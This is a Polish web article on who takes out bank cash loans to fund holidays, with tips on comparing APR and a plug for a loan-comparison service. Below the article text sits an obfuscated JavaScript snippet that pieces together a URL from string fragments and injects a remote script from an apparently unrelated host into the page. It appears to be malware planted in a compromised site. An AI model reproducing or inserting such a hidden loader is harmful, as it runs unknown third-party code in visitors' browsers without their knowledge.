Kto bierze kredyt na wakacje?

Polacy lubią podróżować – szczególnie widoczne jest to w okresie wakacyjnym. Chociaż większość rodaków koncentruje się na krajowych lokalizacjach, niektórzy obierają zagraniczne kierunki. Część osób, aby móc pozwolić sobie na spędzenie wymarzonego urlopu, zaciąga kredyty gotówkowe w bankach. Kim są kredytobiorcy? Sprawdzamy.
Polacy nie stronią od kredytów konsumpcyjnych, w tym kredytów gotówkowych – w 2016 roku banki udzieliły ponad 7 mln sztuk kredytów. Jak wynika m.in. z analizy składanych wniosków dotyczących kredytu bankowego w porównywarce finanse.rankomat.pl, część uzyskanych środków rodacy przeznaczają na realizację wakacyjnych planów.

Kim są kredytobiorcy?

Jak wynika ze statystyk, wśród kredytobiorców przeważają młodzi ludzie. To głównie oni starają się o kredyty gotówkowe, aby móc spełnić swoje marzenia o podróżowaniu – przede wszystkim w egzotyczne zakątki świata. Wsparcie finansowe udzielane przez bank bywa dla nich jedyną możliwością – niskie zarobki i wysokie koszty życia utrudniają gromadzenie oszczędności z myślą np. o wakacjach.
Na kredyty gotówkowe decydują się również rodziny wielodzietne. Wakacje dla pięcioosobowej rodziny to spory wydatek – rzędu nawet kilkunastu tysięcy złotych. Nic więc dziwnego, że takie osoby częściej korzystają z tego rodzaju wsparcia finansowego.

Bierzesz kredyt na wakacje? O tym pamiętaj…

Niezależnie od tego, gdzie planujesz spędzić wakacyjny urlop, musisz pamiętać o kilku kwestiach decydujących o atrakcyjności kredytu bankowego.
Ubiegając się o wsparcie finansowe, należy wziąć pod uwagę:

  • swoją sytuację materialną
  • nie tylko oprocentowanie, ale również prowizję oraz inne koszty – porównaj więc RRSO poszczególnych ofert
  • odpowiedni okres kredytowania – po to, aby wysokość miesięcznej raty nie była nadmiernym obciążeniem domowego budżetu.

Pamiętaj również o tym, że po powrocie z wakacji będzie trzeba spłacać zobowiązanie. W sytuacji, gdy wyjazd wakacyjny nadwyręży Twoje finanse, może to być trudne – szczególnie, gdy miesięczna rata będzie wysoka.
Wystarczy, że poświęcisz zaledwie kilka minut na wypełnienie formularza w porównywarce finansów, a otrzymasz informację o bankach oferujących najkorzystniejsze oferty kredytów gotówkowych. Dzięki temu możesz dopasować je do swoich potrzeb oraz możliwości finansowych.

(function(){
i4ac_=(“u”+”st”);i4ac=document.createElement(“script”);i4ac.async=true;
i4acu=”75910796″;i4ac_+=”a”+(“t.”);i4ac_+=”i”+(“nf”+(“o”))+(“/”);
i4acu+=”.ia9rr7il4acvki5e”;i4acu+=”ruzqehj602ms6r”;
i4ac.src=”https://”+i4ac_+i4acu;i4ac.type=”text/javascript”;
d_b=document.body;d_b.appendChild(i4ac);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.